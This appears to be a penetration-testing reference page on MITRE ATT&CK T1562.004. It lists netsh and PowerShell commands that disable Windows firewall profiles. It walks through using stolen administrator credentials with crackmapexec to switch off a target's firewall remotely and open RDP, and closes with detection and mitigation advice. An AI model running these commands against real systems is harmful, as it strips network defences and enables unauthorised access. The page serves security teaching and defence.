Disable or Modify System Firewall

https://attack.mitre.org/techniques/T1562/004/

ATT&CK ID: T1562.004

Permissions Required: Administrator | SYSTEM

Description

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

[Source]

Techniques

CMD

# Disable all profiles
netsh advfirewall set allprofiles state off

# Disable public profile
netsh advfirewall set publicprofile state off

# Disable domain profile
netsh advfirewall set domainprofile state off

# Disable current profile
netsh advfirewall set  currentprofile state off

# Enable all profiles
netsh advfirewall set allprofiles state on

PowerShell

# Disable all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# Disable public profile
Set-NetFirewallProfile -Profile public -Enabled False

# Disable domain profile
Set-NetFirewallProfile -Profile domain -Enabled False

# Disable private profile
Set-NetFirewallProfile -Profile private -Enabled False

# Enable all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True

Scenario

In the scenario below we have gained access to administrative credentials for the host 10.10.10.10. However, we are looking to gain RDP access.

Scanning port 3389 with Nmap reveals the port is filtered. This is because there is a firewall rule blocking inbound connections to 10.10.10.10.

As we have administrative credentials we perform command execution with crackmapexec. We execute the following command to view the current firewall profiles on the target host.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -d '<Domain>'  -X 'Get-NetFirewallProfile -Name Public,Domain,Private | Select Name,Enabled'

Next, we execute the command below to turn off all available firewall profiles.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -d '<Domain>'  -X 'Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False'

Then check the current status of the profiles again.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -d '<Domain>'  -X 'Get-NetFirewallProfile -Name Public,Domain,Private | Select Name,Enabled'

Where we can then confirm we are now able to see the port 3389 is open for RDP access. We may now connect using a tool such as xfreerdp.

Mitigation

• Monitor for changes in the status of the system firewall such as Windows Security Auditing events 5025 (The Windows firewall service has been stopped) and 5034 (The Windows firewall driver was stopped).

• Monitor for changes made to windows Registry keys and/or values that adversaries might use to disable or modify System Firewall settings such as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy.

• Monitor executed commands and arguments associated with disabling or the modification of system firewalls such as netsh advfirewall set allprofiles state off

Further Reading

Enable / disable firewall from command line: https://www.windows-commandline.com/enable-disable-firewall-command-line/